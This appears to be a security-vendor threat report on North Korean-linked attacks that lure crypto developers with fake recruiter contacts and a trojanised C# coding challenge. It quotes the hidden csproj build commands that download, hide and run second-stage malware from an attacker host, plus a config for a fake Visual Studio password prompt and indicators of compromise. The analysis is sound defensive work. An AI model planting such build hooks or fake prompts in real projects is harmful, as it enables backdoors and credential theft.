Short Summary:
On September 3, 2024, the FBI warned the crypto industry about North Korea’s use of social engineering techniques to deliver malware. Jamf Threat Labs has observed targeted attacks where individuals are contacted via professional networking platforms, leading to the installation of malware disguised as coding challenges. These attacks utilize sophisticated methods to exploit human vulnerabilities, with malware capable of stealing information and maintaining persistence on infected systems.
Key Points:
- The FBI issued a warning about North Korea targeting individuals in the crypto industry.
- Attacks often begin with social media outreach, particularly on professional networking sites.
- Malware is delivered through fake job offers and coding challenges.
- Two main malware payloads identified: VisualStudioHelper and zsh_env.
- Both payloads exhibit similar functionalities but differ in persistence methods and capabilities.
- Thiefbucket (also known as Rustdoor) is associated with these attacks, featuring infostealer capabilities.
- Organizations are advised to train employees to be cautious of unsolicited requests to run software.
MITRE ATT&CK TTPs – created by AI
- Social Engineering (Tactics: Initial Access)
- Actors scout victims on social media platforms.
- Impersonation of recruiters to gain trust.
- Malicious File Execution (Tactics: Execution)
- Malware delivered through zipped coding challenges.
- Execution of non-standard or unknown packages.
- Persistence (Tactics: Persistence)
- VisualStudioHelper uses cron for persistence.
- zsh_env persists via the .zshrc configuration file.
- Credential Access (Tactics: Credential Access)
- Malware prompts users for passwords through deceptive dialog boxes.
- Command and Control (Tactics: Command and Control)
- Malware communicates with command and control servers.
On September 3, 2024 the Federal Bureau of Investigations (FBI) released a public service announcement set to warn those in the crypto industry that the Democratic People’s Republic of Korea (“DPRK” aka North Korea) has been targeting individuals by using clever social engineering techniques for the successful delivery of malware.
Authors: Jaron Bradley and Ferdous Saljooki
The DPRK has a long history of acquiring financial gains through creative and illicit means. Over the years, a significant portion of these financial gains has come from successful cyberattacks. As mentioned by the FBI’s public service announcement, specific individuals within crypto companies are being targeted.
As part of Jamf’s ongoing research, Jamf Threat Labs had been proactively monitoring attacks that closely aligned with these warnings. Below, we provide detailed insights into the nature of these attacks in order to provide others with the knowledge needed to better identify and mitigate potential threats. The majority of attacks begin with an individual reaching out over a social media platform leading to the delivery of malware in some manner.
Social engineering
Humans have long been considered the weakest link in the cybersecurity chain, and attackers continue to exploit this vulnerability through increasingly sophisticated social engineering tactics. Social engineering schemes often target individuals through professional networking platforms, making users the first line of defense but also the most vulnerable.
Per the FBI announcement:
Before initiating contact, the actors scout prospective victims by reviewing social media activity, particularly on professional networking or employment-related platforms.
Jamf Threat Labs noted an attack attempt in which a user was contacted on LinkedIn by an individual claiming to be a recruiter on the HR team at a tech company that specializes in decentralized finance.
LinkedIn profile impersonating an HR professional and used to contact potential victims
Note at the bottom of the image that this profile has 0 followers which can be a good indicator that this account was created recently. Much of this profile and the techniques used align with further documentation within the FBI announcement.
“The actors may also impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate.”
Although we are unfamiliar with the website ston.fi and can’t speak to its legitimacy, the recruiter claiming to work there is clearly meant to capture the target’s interest.
Code execution attempts
The FBI announcement goes on to document a number of ways in which the fraud recruiter might convince a user to install malware. An attack scenario observed by Jamf Threat Labs was closest to that of bullet point two from the writeup.
- Requests to conduct a “pre-employment test” or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
In the observed scenario, the recruiter sent a zipped coding challenge to the target (51a88646f9770e09b3505bd5cbadc587abb952ba), which is considered to be a fairly common step in the screening processes of a modern day development role. This coding challenge came in the form of a Visual Studio project that has the developer focus on converting Slack messages to CSV format in C#. However, buried within two separate csproj files are malicious bash commands that both download a second stage payload. The two csproj files can be seen at the following locations:
TestProject/SlackToCsv.csproj
TestProject/SlackToCsv.Test/SlackToCsv.Test.csproj
TestProject/SlackToCsv.csproj
TestProject/SlackToCsv.Test/SlackToCsv.Test.csproj
The following bash commands will execute upon building the project:
<Exec Command=”bash -c ‘cd /Users/$USER/Library/ && curl -O -s https://taurihostmetrics[.]com/cloud/VisualStudioHelper && chmod +x VisualStudioHelper && chflags hidden VisualStudioHelper && ./VisualStudioHelper'”/>
<Exec Command="bash -c 'cd /Users/$USER/Library/ && curl -O -s https://taurihostmetrics[.]com/cloud/VisualStudioHelper && chmod +x VisualStudioHelper && chflags hidden VisualStudioHelper && ./VisualStudioHelper'"/>
<Exec Command=”bash -c ‘cd /Users/$USER/.config && curl -O -s https://taurihostmetrics[.]com/cloud/zsh_env && chmod +x zsh_env && chflags hidden zsh_env && ./zsh_env'”/> </Target>
<Exec Command="bash -c 'cd /Users/$USER/.config && curl -O -s https://taurihostmetrics[.]com/cloud/zsh_env && chmod +x zsh_env && chflags hidden zsh_env && ./zsh_env'"/> </Target>
Both scripts change their root directory and then download a second stage payload via curl from taurihostmetrics[.]com.
f669fba857401406db6b35958d5f57d9d8030f56 -> VisualStudioHelper
5ec7497107478f08ca5018bf659f9340880c059c -> zsh_env
f669fba857401406db6b35958d5f57d9d8030f56 -> VisualStudioHelper
5ec7497107478f08ca5018bf659f9340880c059c -> zsh_env
Each payload is marked as executable and then hidden before being run. These two executables are both stage two malware. VisualStudioHelper communicates with wiresapplication[.]com while zsh_env communicates with juchesoviet48[.]com.
The stage two malware that is dropped by the coding challenge is tracked by Jamf Threat Labs under the name Thiefbucket but is known to some as “Rustdoor.” Jamf Threat Labs has always attributed this malware to the ongoing DPRK activity due to the stage one techniques and the manner in which they are delivered to their targets.
Stage two: comparison of configuration
As mentioned in the above section, two executables were downloaded and executed by the fake coding challenge. These two executables are nearly identical in functionality. What primarily sets them apart is their embedded configurations.
The config files embedded within the two separate malware samples shows that the VisualStudioHelper will persist via cron while zsh_env will persist via the zshrc file.
Further down, line 19 shows that VisualStudioHelper has a configuration setting called “files” set to true. This setting will cause the malware to act as an infostealer by grabbing a number of different files specified further down in the config. In order to acquire some of the most valuable files, infostealers often require further permissions. These permissions are obtained by the malware via a popup window. This prompt is also defined within the config file.
{
“id”: 6,
“name”: “Visual Studio”,
“path”: “/Applications/Visual Studio.app/”,
“icon”: “/Applications/Visual Studio.app/Contents/Resources/VisualStudio.icns”,
“exec”: “VisualStudio”,
“show_dialog”: true,
“dialog_title”: “Visual Studio Setup”,
“dialog_msg”: “Visual Studio requires permission to compilation projects. Please enter password for <username>”
}
{
"id": 6,
"name": "Visual Studio",
"path": "/Applications/Visual Studio.app/",
"icon": "/Applications/Visual Studio.app/Contents/Resources/VisualStudio.icns",
"exec": "VisualStudio",
"show_dialog": true,
"dialog_title": "Visual Studio Setup",
"dialog_msg": "Visual Studio requires permission to compilation projects. Please enter password for <username>"
}
The above excerpt shows a portion of the config within the VisualStudioHelper payload that will cause the malware to prompt the user for their password using a prompt window that is tailored to look as though it originated from Visual Studio. Given that this prompt is displayed at the same time the project is built, the user may be more likely to think nothing of it and enter their password.
The other stage two malware that is downloaded (zsh_env) simply sets up persistence via the .zshrc configuration. This ensures that any time the user opens a zsh shell moving forward, the malware will also be executed. This is a technique that likely ends up being reliable given the attacker knows they’re targeting a developer who will likely use the Terminal, again causing the backdoor to be run in the background.
In summary: both payloads are highly similar. The difference between the two is:
- VisualStudioHelper acts as an automated infostealer, can operate as a standard backdoor when invoked by cron and communicates with wiresapplication[.]com.
- zsh_env operates as a backdoor, does not automate any of the infostealer functionality, persists via the zshrc config file, and uses a command and control server at juchesoviet48[.]com.
Stage two capabilities and updates
Since its original discovery, Thiefbucket has held the following capabilities:
- Automation of infostealer-like logic
- Download files
- Upload files
- Kill processes
- Delete files and directories
- Sleep
- Quickly search indexed files using Spotlight
- Ability to self delete
- Ability to run shell commands
- Ability to prompt the user with dialog boxes
- Ability to persist via LaunchAgent, cron, dock, and zshrc profiles.
The malware has a handful of differences from its first appearance, most notably the executable that was originally written in Rust seems to have been re-created in Objective-C.
Jamf Threat Labs continues to investigate the differences in features, but at a first glance they appear to be minor. The help page for the malware has been updated with a handful of new arguments. Most of these appear to be ways to run or test the embedded config features. We’ve marked the new available arguments below with asterisks.
./zsh_env –help
Usage: zsh_env [OPTIONS]
Options:
-l, –launch-agent Launch agent mode
-r, –remove-agent Remove launch agent
-d, –daemon Daemon mode
-u, –unlock Remove lock file
–inject-launch Starter as injected launch agent *
–inject-rc Starter as injected rc *
–bin <PATH TO BINARY> Path to packed binary *
–dialog *
–test-dialog Dialogue to test *
-h, –help Print help
-V, –version Print version
./zsh_env --help
Usage: zsh_env [OPTIONS]
Options:
-l, --launch-agent Launch agent mode
-r, --remove-agent Remove launch agent
-d, --daemon Daemon mode
-u, --unlock Remove lock file
--inject-launch Starter as injected launch agent *
--inject-rc Starter as injected rc *
--bin <PATH TO BINARY> Path to packed binary *
--dialog *
--test-dialog Dialogue to test *
-h, --help Print help
-V, --version Print version
It’s worth noting that the VisualStudioHelper payload makes use of the --dialog
argument when it prompts the user for their password.
When testing the --bin
argument, we observed that Thiefbucket will add the supplied binary path to the zshrc file before deleting itself.
Conclusion
Threat actors continue to remain vigilant in finding new ways to pursue those in the crypto industry. Jamf Threat Labs has seen attacks in line with the FBI warning that went out this month. It’s important to train your employees, including your developers, to be hesitant to trust those who connect on social media and ask users to run software of any type. These social engineering schemes performed by the DPRK come from those who are well-versed in English and enter the conversation having well researched their target. We recommend reading the public service announcement for a list of mitigations and best practices.
Indicators
51a88646f9770e09b3505bd5cbadc587abb952ba – Project.zip (Coding Challenge)
5ec7497107478f08ca5018bf659f9340880c059c – zsh_env (Universal Binary)
a246db8fe1a4f385ed5e2eed5087a60fd2be6b5a – zsh_env (ARM)
254aad39a432ff0df2ce35cc4ff3578afe1dc1df – zsh_env (x86_64)
f669fba857401406db6b35958d5f57d9d8030f56 – VisualStudioHelper (Universal Binary)
f11ca6e92a3f2af3590021d1475a740e6246347e – VisualStudioHelper (ARM)
c401c8aafc28317828f6b648a3abf6e01d05efae – VisualStudioHelper (x86_64)
taurihostmetrics[.]com -> 139.59.182[.]234 (malware hosting)
wiresapplication[.]com -> 62.204.41[.]73 (command and control)
juchesoviet48[.]com -> 185.234.216[.]180 (command and control)
Indicators
51a88646f9770e09b3505bd5cbadc587abb952ba - Project.zip (Coding Challenge)
5ec7497107478f08ca5018bf659f9340880c059c - zsh_env (Universal Binary)
a246db8fe1a4f385ed5e2eed5087a60fd2be6b5a - zsh_env (ARM)
254aad39a432ff0df2ce35cc4ff3578afe1dc1df - zsh_env (x86_64)
f669fba857401406db6b35958d5f57d9d8030f56 - VisualStudioHelper (Universal Binary)
f11ca6e92a3f2af3590021d1475a740e6246347e - VisualStudioHelper (ARM)
c401c8aafc28317828f6b648a3abf6e01d05efae - VisualStudioHelper (x86_64)
taurihostmetrics[.]com -> 139.59.182[.]234 (malware hosting)
wiresapplication[.]com -> 62.204.41[.]73 (command and control)
juchesoviet48[.]com -> 185.234.216[.]180 (command and control)
Source: https://www.jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/